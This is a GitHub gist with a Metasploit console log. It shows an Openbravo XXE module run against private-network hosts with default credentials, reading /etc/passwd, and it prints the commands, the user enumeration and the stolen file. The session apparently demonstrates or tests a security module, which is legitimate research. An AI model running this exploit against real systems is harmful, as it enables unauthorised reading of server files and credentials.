Skip to content

Instantly share code, notes, and snippets.

@brandonprry

brandonprry/gist:7273935

Created November 2, 2013 00:16
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save brandonprry/7273935 to your computer and use it in GitHub Desktop.
Save brandonprry/7273935 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.txt
bperry@w00den-pickle:~/Projects/metasploit-framework$ ./msfconsole -q
msf > use auxiliary/admin/http/openbravo_xxe
msf auxiliary(openbravo_xxe) > set RHOST 192.168.1.8
RHOST => 192.168.1.8
msf auxiliary(openbravo_xxe) > show options
Module options (auxiliary/admin/http/openbravo_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
ENDPOINT ADUser yes The XML API REST endpoint to use
FILEPATH /etc/passwd yes The filepath to read on the server
PASSWORD openbravo yes The Openbravo password
Proxies no Use a proxy chain
RHOST 192.168.1.8 yes The target address
RPORT 80 yes The target port
TARGETURI /openbravo/ yes Base Openbravo directory path
USERNAME Openbravo yes The Openbravo user
VHOST no HTTP server virtual host
msf auxiliary(openbravo_xxe) > exploit
[*] Requesting list of entities from endpoint, this may take a minute...
[*] Found ADUser System with ID: 0
[*] Trying System
[-] Problem updating ADUser System with ID: 0
[*] Found ADUser Ana Cortés with ID: 6A3D3D6A808C455EAF1DAB48058FDBF4
[*] Trying Ana Cortés
[-] Problem updating ADUser Ana Cortés with ID: 6A3D3D6A808C455EAF1DAB48058FDBF4
[*] Found ADUser José Pérez with ID: 50A34002FDA34FC58F1319E25EDA4E3A
[*] Trying José Pérez
[-] Problem updating ADUser José Pérez with ID: 50A34002FDA34FC58F1319E25EDA4E3A
[*] Found ADUser Marcos Pedro with ID: CA5D537DFD014F15BFFBA0DB81E1A379
[*] Trying Marcos Pedro
[*] Found writeable ADUser: Marcos Pedro
[*] Cleaning up after ourselves...
[+] File saved to: /home/bperry/.msf4/loot/20131101191355_default_192.168.1.8_openbravo.file_324988.8
[*] Auxiliary module execution completed
msf auxiliary(openbravo_xxe) > cat /home/bperry/.msf4/loot/20131101191355_default_192.168.1.8_openbravo.file_324988.8
[*] exec: cat /home/bperry/.msf4/loot/20131101191355_default_192.168.1.8_openbravo.file_324988.8
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
bperry:x:1000:1000:bperry,,,:/home/bperry:/bin/bash
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
colord:x:107:116:colord colour management daemon,,,:/var/lib/colord:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
openbravo:x:109:118::/home/openbravo:/bin/bash
msf auxiliary(openbravo_xxe) > set RHOST 192.168.1.9
RHOST => 192.168.1.9
msf auxiliary(openbravo_xxe) > exploit
[*] Requesting list of entities from endpoint, this may take a minute...
[*] Found ADUser System with ID: 0
[*] Trying System
[-] Problem updating ADUser System with ID: 0
[*] Found ADUser Rome with ID: 20C5D31133D949F0BD25412DD1069612
[*] Trying Rome
[-] Problem updating ADUser Rome with ID: 20C5D31133D949F0BD25412DD1069612
[*] Found ADUser Joe Matt with ID: 2748452130E84FF0B1A8292D88570F8F
[*] Trying Joe Matt
[-] Problem updating ADUser Joe Matt with ID: 2748452130E84FF0B1A8292D88570F8F
[*] Found ADUser Pablo Ramos with ID: 33FE57CFE5BE4774B9B9EDFD8E27BCAE
[*] Trying Pablo Ramos
[-] Problem updating ADUser Pablo Ramos with ID: 33FE57CFE5BE4774B9B9EDFD8E27BCAE
[*] Found ADUser José Pérez with ID: 50A34002FDA34FC58F1319E25EDA4E3A
[*] Trying José Pérez
[-] Problem updating ADUser José Pérez with ID: 50A34002FDA34FC58F1319E25EDA4E3A
[*] Found ADUser Thomas Robby with ID: 545A04EE5EF94E9B967536140226793F
[*] Trying Thomas Robby
[-] Problem updating ADUser Thomas Robby with ID: 545A04EE5EF94E9B967536140226793F
[*] Found ADUser Tom with ID: 6628F632D484407CBCBD8E71C123A263
[*] Trying Tom
[-] Problem updating ADUser Tom with ID: 6628F632D484407CBCBD8E71C123A263
[*] Found ADUser María Luz with ID: 6822CC074A064323B639A7087ED14859
[*] Trying María Luz
[-] Problem updating ADUser María Luz with ID: 6822CC074A064323B639A7087ED14859
[*] Found ADUser Ana Cortés with ID: 6A3D3D6A808C455EAF1DAB48058FDBF4
[*] Trying Ana Cortés
[-] Problem updating ADUser Ana Cortés with ID: 6A3D3D6A808C455EAF1DAB48058FDBF4
[*] Found ADUser Luis Rodriguez with ID: 6B1E8F0CA1524850AB3A7F9AE475A16F
[*] Trying Luis Rodriguez
[-] Problem updating ADUser Luis Rodriguez with ID: 6B1E8F0CA1524850AB3A7F9AE475A16F
[*] Found ADUser Mathieu Le Grand with ID: 81FE8AF4E1EF4488B0D92143942C79C3
[*] Trying Mathieu Le Grand
[-] Problem updating ADUser Mathieu Le Grand with ID: 81FE8AF4E1EF4488B0D92143942C79C3
[*] Found ADUser John Smith with ID: 8537B1F5669E423ABA79F1F57B1E4222
[*] Trying John Smith
[-] Problem updating ADUser John Smith with ID: 8537B1F5669E423ABA79F1F57B1E4222
[*] Found ADUser Luca Simone with ID: A6EA3469E33544D184F836D97F274E0A
[*] Trying Luca Simone
[-] Problem updating ADUser Luca Simone with ID: A6EA3469E33544D184F836D97F274E0A
[*] Found ADUser Phil Bill with ID: BFEF159DC6BF4178913C9E38FB706155
[*] Trying Phil Bill
[-] Problem updating ADUser Phil Bill with ID: BFEF159DC6BF4178913C9E38FB706155
[*] Found ADUser Javier Martín with ID: C3503BEFB3CB4848A674284A656163B9
[*] Trying Javier Martín
[-] Problem updating ADUser Javier Martín with ID: C3503BEFB3CB4848A674284A656163B9
[*] Found ADUser Marcos Pedro with ID: CA5D537DFD014F15BFFBA0DB81E1A379
[*] Trying Marcos Pedro
[-] Problem updating ADUser Marcos Pedro with ID: CA5D537DFD014F15BFFBA0DB81E1A379
[*] Found ADUser Juan López with ID: CADCDC3549FB4201B5F24E4C03AD2349
[*] Trying Juan López
[-] Problem updating ADUser Juan López with ID: CADCDC3549FB4201B5F24E4C03AD2349
[*] Found ADUser Openbravo with ID: 100
[*] Trying Openbravo
[-] Problem updating ADUser Openbravo with ID: 100
[*] Auxiliary module execution completed
msf auxiliary(openbravo_xxe) > rexploit
[*] Reloading module...
[*] Requesting list of entities from endpoint, this may take a minute...
[*] Found ADUser System with ID: 0
[*] Trying System
500
[-] Problem updating ADUser System with ID: 0
[*] Found ADUser Rome with ID: 20C5D31133D949F0BD25412DD1069612
[*] Trying Rome
500
[-] Problem updating ADUser Rome with ID: 20C5D31133D949F0BD25412DD1069612
[*] Found ADUser Joe Matt with ID: 2748452130E84FF0B1A8292D88570F8F
[*] Trying Joe Matt
500
[-] Problem updating ADUser Joe Matt with ID: 2748452130E84FF0B1A8292D88570F8F
[*] Found ADUser Pablo Ramos with ID: 33FE57CFE5BE4774B9B9EDFD8E27BCAE
[*] Trying Pablo Ramos
500
[-] Problem updating ADUser Pablo Ramos with ID: 33FE57CFE5BE4774B9B9EDFD8E27BCAE
[*] Found ADUser José Pérez with ID: 50A34002FDA34FC58F1319E25EDA4E3A
[*] Trying José Pérez
500
[-] Problem updating ADUser José Pérez with ID: 50A34002FDA34FC58F1319E25EDA4E3A
[*] Found ADUser Thomas Robby with ID: 545A04EE5EF94E9B967536140226793F
[*] Trying Thomas Robby
500
[-] Problem updating ADUser Thomas Robby with ID: 545A04EE5EF94E9B967536140226793F
[*] Found ADUser Tom with ID: 6628F632D484407CBCBD8E71C123A263
[*] Trying Tom
500
[-] Problem updating ADUser Tom with ID: 6628F632D484407CBCBD8E71C123A263
[*] Found ADUser María Luz with ID: 6822CC074A064323B639A7087ED14859
[*] Trying María Luz
500
[-] Problem updating ADUser María Luz with ID: 6822CC074A064323B639A7087ED14859
[*] Found ADUser Ana Cortés with ID: 6A3D3D6A808C455EAF1DAB48058FDBF4
[*] Trying Ana Cortés
500
[-] Problem updating ADUser Ana Cortés with ID: 6A3D3D6A808C455EAF1DAB48058FDBF4
[*] Found ADUser Luis Rodriguez with ID: 6B1E8F0CA1524850AB3A7F9AE475A16F
[*] Trying Luis Rodriguez
500
[-] Problem updating ADUser Luis Rodriguez with ID: 6B1E8F0CA1524850AB3A7F9AE475A16F
[*] Found ADUser Mathieu Le Grand with ID: 81FE8AF4E1EF4488B0D92143942C79C3
[*] Trying Mathieu Le Grand
500
[-] Problem updating ADUser Mathieu Le Grand with ID: 81FE8AF4E1EF4488B0D92143942C79C3
[*] Found ADUser John Smith with ID: 8537B1F5669E423ABA79F1F57B1E4222
[*] Trying John Smith
500
[-] Problem updating ADUser John Smith with ID: 8537B1F5669E423ABA79F1F57B1E4222
[*] Found ADUser Luca Simone with ID: A6EA3469E33544D184F836D97F274E0A
[*] Trying Luca Simone
500
[-] Problem updating ADUser Luca Simone with ID: A6EA3469E33544D184F836D97F274E0A
[*] Found ADUser Phil Bill with ID: BFEF159DC6BF4178913C9E38FB706155
[*] Trying Phil Bill
500
[-] Problem updating ADUser Phil Bill with ID: BFEF159DC6BF4178913C9E38FB706155
[*] Found ADUser Javier Martín with ID: C3503BEFB3CB4848A674284A656163B9
[*] Trying Javier Martín
500
[-] Problem updating ADUser Javier Martín with ID: C3503BEFB3CB4848A674284A656163B9
[*] Found ADUser Marcos Pedro with ID: CA5D537DFD014F15BFFBA0DB81E1A379
[*] Trying Marcos Pedro
500
[-] Problem updating ADUser Marcos Pedro with ID: CA5D537DFD014F15BFFBA0DB81E1A379
[*] Found ADUser Juan López with ID: CADCDC3549FB4201B5F24E4C03AD2349
[*] Trying Juan López
500
[-] Problem updating ADUser Juan López with ID: CADCDC3549FB4201B5F24E4C03AD2349
[*] Found ADUser Openbravo with ID: 100
[*] Trying Openbravo
500
[-] Problem updating ADUser Openbravo with ID: 100
[*] Auxiliary module execution completed
msf auxiliary(openbravo_xxe) > set RHOST 192.168.1.8
RHOST => 192.168.1.8
msf auxiliary(openbravo_xxe) > exploit
[*] Requesting list of entities from endpoint, this may take a minute...
[*] Found ADUser System with ID: 0
[*] Trying System
200
[-] Problem updating ADUser System with ID: 0
[*] Found ADUser Ana Cortés with ID: 6A3D3D6A808C455EAF1DAB48058FDBF4
[*] Trying Ana Cortés
500
[-] Problem updating ADUser Ana Cortés with ID: 6A3D3D6A808C455EAF1DAB48058FDBF4
[*] Found ADUser José Pérez with ID: 50A34002FDA34FC58F1319E25EDA4E3A
[*] Trying José Pérez
500
[-] Problem updating ADUser José Pérez with ID: 50A34002FDA34FC58F1319E25EDA4E3A
[*] Found ADUser María Luz with ID: 6822CC074A064323B639A7087ED14859
[*] Trying María Luz
500
[-] Problem updating ADUser María Luz with ID: 6822CC074A064323B639A7087ED14859
[*] Found ADUser Rome with ID: 20C5D31133D949F0BD25412DD1069612
[*] Trying Rome
200
[*] Found writeable ADUser: Rome
[*] Cleaning up after ourselves...
[+] File saved to: /home/bperry/.msf4/loot/20131101191606_default_192.168.1.8_openbravo.file_962018.8
[*] Auxiliary module execution completed
msf auxiliary(openbravo_xxe) >
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment